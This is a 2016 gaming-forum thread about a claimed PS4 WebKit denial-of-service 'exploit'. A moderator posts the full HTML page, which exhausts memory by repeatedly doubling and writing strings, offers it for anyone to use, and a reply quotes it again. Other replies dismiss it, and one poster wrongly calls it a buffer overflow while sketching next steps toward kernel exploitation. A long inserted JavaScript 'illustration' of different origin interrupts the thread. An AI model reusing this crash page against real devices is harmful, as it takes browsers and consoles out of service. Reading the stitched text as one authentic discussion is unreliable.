Post: PS4 4.01 Webkit DoS Exploit (Full System Crash Sometimes) by Insityyy
10-29-2016, 04:55 AM #1
Hydrogen
Super Mod
Hello NextGenUpdate, today, a member from PSXHAX, Insityyy, has shown us a PS4 4.01 Webkit DoS Exploit which he tries to use by editing some of the HTML code. He tells us that his system crashes sometimes, but sometimes the vulnerability goes through. Insityyy also shares the code with us for whoever likes to use it, and see if they can work around it.

Insityyy states in his own words:

"So, I found a vulnerability that seems to work on PS4. I modified the HTML code a little, just to make it say Webkit crash at the top and to add a "start exploit" button, and to make it more reliable on the PS4 web browser.

Anyways, I have been testing this vulnerability out and it seems to sometimes crash the entire system and requires a reboot to be usable again.

I have a video of what it did after I tried this (after 1 reboot):"



He shared his code with the whole public community. If you think you can use it to make a new working workaround, feel free:

<html>
<head>
<title>Not Enough Free System Memory DoS Exploit</title>
<script>
// Seven two-character strings are doubled on every pass of the loop and each
// one is written into the page, so the amount of text in the document grows
// exponentially. This exhausts memory; it does not overflow a fixed buffer.
function dos()
{
    // unescape("%u4141%u4141") is the two-character string "\u4141\u4141"
    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");
    var longunistring5 = unescape("%u4545%u4545");
    var longunistring6 = unescape("%u4646%u4646");
    var longunistring7 = unescape("%u4747%u4747");

    // 951 passes; each one doubles every string and writes it out again
    for (var i = 0; i <= 950; ++i)
    {
        longunistring1 += longunistring1;
        longunistring2 += longunistring2;
        longunistring3 += longunistring3;
        longunistring4 += longunistring4;
        longunistring5 += longunistring5;
        longunistring6 += longunistring6;
        longunistring7 += longunistring7;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
        document.write(longunistring5);
        document.write(longunistring6);
        document.write(longunistring7);
    }
    // one last write of the fully grown strings
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
    document.write(longunistring5);
    document.write(longunistring6);
    document.write(longunistring7);
}
</script>
</head>
<body>
<input type="button" value="Start Exploit" onclick="dos();">
</body>
</html>

The following user groaned Hydrogen for this awful post:

KL9
10-29-2016, 06:15 AM #2
Originally posted by Hydrogen
Hello NextGenUpdate, today, a member from PSXHAX, Insityyy, has shown us a PS4 4.01 Webkit DoS Exploit which he tries to use by editing some of the HTML code. He tells us that his system crashes sometimes, but sometimes the vulnerability goes through. Insityyy also shares the code with us for whoever likes to use it, and see if they can work around it.

Insityyy states in his own words:

"So, I found a vulnerability that seems to work on PS4. I modified the HTML code a little, just to make it say Webkit crash at the top and to add a "start exploit" button, and to make it more reliable on the PS4 web browser.

Anyways, I have been testing this vulnerability out and it seems to sometimes crash the entire system and requires a reboot to be usable again.

I have a video of what it did after I tried this (after 1 reboot):"



He shared his code with the whole public community. If you think you can use it to make a new working workaround, feel free:

<html>
<head>
<title>Not Enough Free System Memory DoS Exploit</title>
<script>
// Seven two-character strings are doubled on every pass of the loop and each
// one is written into the page, so the amount of text in the document grows
// exponentially. This exhausts memory; it does not overflow a fixed buffer.
function dos()
{
    // unescape("%u4141%u4141") is the two-character string "\u4141\u4141"
    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");
    var longunistring5 = unescape("%u4545%u4545");
    var longunistring6 = unescape("%u4646%u4646");
    var longunistring7 = unescape("%u4747%u4747");

    // 951 passes; each one doubles every string and writes it out again
    for (var i = 0; i <= 950; ++i)
    {
        longunistring1 += longunistring1;
        longunistring2 += longunistring2;
        longunistring3 += longunistring3;
        longunistring4 += longunistring4;
        longunistring5 += longunistring5;
        longunistring6 += longunistring6;
        longunistring7 += longunistring7;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
        document.write(longunistring5);
        document.write(longunistring6);
        document.write(longunistring7);
    }
    // one last write of the fully grown strings
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
    document.write(longunistring5);
    document.write(longunistring6);
    document.write(longunistring7);
}
</script>
</head>
<body>
<input type="button" value="Start Exploit" onclick="dos();">
</body>
</html>


This is retarded, this is nowhere near to being an exploit.

The following user thanked Red-EyeX32 for this useful post:

KL9
10-29-2016, 06:25 AM #3
Hydrogen
Super Mod
Originally posted by EyeX32
This is retarded, this is nowhere near to being an exploit.


Thanks for pointing that out, how come?
10-29-2016, 11:58 AM #4
ProtoBuffers
Bounty hunter
..... TF did I just read, how would that even begin to work?
WTF is longunistring
Why are DoS, HTML, and Java being used at the same time?
There is no output to the input. So please tell me what this is supposed to do XD
The only thing my mind understood was this PlayStation 4 is called PlayStation 4 and is using a 4.01 update.
Question: Are the PS4 update files still a potentially unwanted program (.PUP)?
Last edited by ProtoBuffers; 10-29-2016 at 12:01 PM.
10-29-2016, 04:31 PM #5
Hydrogen
Super Mod
Originally posted by xciergaming
..... TF did I just read, how would that even begin to work?
WTF is longunistring
Why are DoS, HTML, and Java being used at the same time?
There is no output to the input. So please tell me what this is supposed to do XD
The only thing my mind understood was this PlayStation 4 is called PlayStation 4 and is using a 4.01 update.
Question: Are the PS4 update files still a potentially unwanted program (.PUP)?


Aha, don't ask me, I just share the content. I'll let you all be the judge.
10-29-2016, 06:28 PM #6
KL9
★ NGU ★
Originally posted by Hydrogen
Aha, don't ask me, I just share the content. I'll let you all be the judge.


I'd recommend quality over quantity if you don't even know what it is lol
10-29-2016, 08:52 PM #7
escalion
Save Point
What has been demonstrated is a buffer overflow, which on its own is, as Red-Eye has said, useless.

What would be useful is to identify the point at which the memory is overflowed.
Maybe creating a similar function but providing some sort of output so we can identify the point at which it crashes would be helpful.
The next stage after that would be to identify where in the memory we are overflowing to, and if it is useful... Maybe craft a section which will produce some sort of output, so we can see if we can execute from this memory location, and with what privilege it is being executed.
I can't envisage that the kernel memory layout is *too* different from 3.55, so it may be possible to try jumping to a few 'known'-ish locations... you get the idea.

The problem with kernel memory is that it is 'protected' in the sense that the kernel 'hides' it from application space, so the only way this will be exploitable is if a kernel module itself is handling the allocation from webkit.

I haven't done a huge amount of research into PS4 security, but it seems that not much is being done to find a hardware exploit... why, guys?
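As an added illustration (not code from the thread, from Insityyy or from escalion), the following JavaScript models what the posted dos() function actually does and what escalion asks for above: it computes, without allocating anything, how many loop passes it takes for the text written by document.write() to exceed a given memory budget, and it probes where a real JavaScript engine refuses to keep doubling a string. The memory budgets, the two-character seed (the same value unescape("%u4141%u4141") produces) and the 40-doubling safety cap are constructed assumptions; DOM node overhead is ignored, so the byte counts are a lower bound on what the page consumes.

```javascript
// Added example, not from the thread. Models the posted dos() function:
// seven two-character strings are doubled and written out once per loop pass.

const STRINGS = 7;          // longunistring1 .. longunistring7
const SEED_UNITS = 2;       // unescape("%u4141%u4141") is two UTF-16 code units
const BYTES_PER_UNIT = 2;   // UTF-16 storage; DOM overhead ignored (lower bound)

// UTF-16 bytes written by document.write() across all seven strings after
// `passes` loop iterations. Per string the written lengths are 4, 8, 16, ...
// so the running total is SEED_UNITS * 2 * (2^passes - 1) code units.
function bytesWrittenAfter(passes) {
  const unitsPerString = SEED_UNITS * 2 * (Math.pow(2, passes) - 1);
  return unitsPerString * BYTES_PER_UNIT * STRINGS;
}

// Smallest number of passes whose cumulative output exceeds `budgetBytes`.
// The posted loop runs 951 passes, so any realistic budget is blown early.
function passesToExceed(budgetBytes) {
  let passes = 0;
  while (bytesWrittenAfter(passes) <= budgetBytes) passes++;
  return passes;
}

// Growth table for a human reader: pass index -> MiB written so far.
function growthTable(maxPasses) {
  const rows = [];
  for (let p = 1; p <= maxPasses; p++) {
    rows.push({ pass: p, mib: bytesWrittenAfter(p) / (1024 * 1024) });
  }
  return rows;
}

// Empirical check of how a JavaScript engine bounds the same doubling loop.
// Engines represent s + s as a rope, so this uses very little memory; they
// refuse once the length passes their maximum string length and throw
// (V8 throws RangeError: Invalid string length). `maxDoublings` is a
// constructed safety cap: no engine allows a string of 2^41 code units.
function probeEngineLimit(seed, maxDoublings) {
  seed = seed === undefined ? "\u4141\u4141" : seed;
  maxDoublings = maxDoublings === undefined ? 40 : maxDoublings;
  let s = seed;
  let doublings = 0;   // number of doublings that succeeded
  try {
    while (doublings < maxDoublings) {
      s += s;
      doublings++;
    }
    return { doublings, lengthReached: s.length, error: null };
  } catch (e) {
    // s still holds the last string the engine accepted
    return { doublings, lengthReached: s.length, error: e.name + ": " + e.message };
  }
}

const MiB = 1024 * 1024;
console.log("passes to exceed 512 MiB of written text:", passesToExceed(512 * MiB));
console.log("passes to exceed 8 GiB of written text:", passesToExceed(8 * 1024 * MiB));
console.log("first 30 passes (MiB written):", growthTable(30));
console.log("engine limit:", probeEngineLimit());
```

The two halves make the same point from different sides: the arithmetic shows that the output crosses hundreds of megabytes within a few dozen passes of a 951-pass loop, and the probe shows that a desktop engine stops the doubling itself with an exception rather than running the machine out of memory. That is what separates this from a buffer overflow: nothing is written past a fixed-size allocation, the page simply asks for more memory than the device has, and whether the result is a caught exception, a closed tab or a full system crash depends on how the host handles allocation failure.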
11-02-2016, 02:25 AM #8
ProtoBuffers
Bounty hunter
Originally posted by escalion
What has been demonstrated is a buffer overflow, which on its own is, as Red-Eye has said, useless.

What would be useful is to identify the point at which the memory is overflowed.
Maybe creating a similar function but providing some sort of output so we can identify the point at which it crashes would be helpful.
The next stage after that would be to identify where in the memory we are overflowing to, and if it is useful... Maybe craft a section which will produce some sort of output, so we can see if we can execute from this memory location, and with what privilege it is being executed.
I can't envisage that the kernel memory layout is *too* different from 3.55, so it may be possible to try jumping to a few 'known'-ish locations... you get the idea.

The problem with kernel memory is that it is 'protected' in the sense that the kernel 'hides' it from application space, so the only way this will be exploitable is if a kernel module itself is handling the allocation from webkit.

I haven't done a huge amount of research into PS4 security, but it seems that not much is being done to find a hardware exploit... why, guys?


HCF command omg O_O why do all this whatever tf this is

Copyright © 2024, NextGenUpdate.
All Rights Reserved.
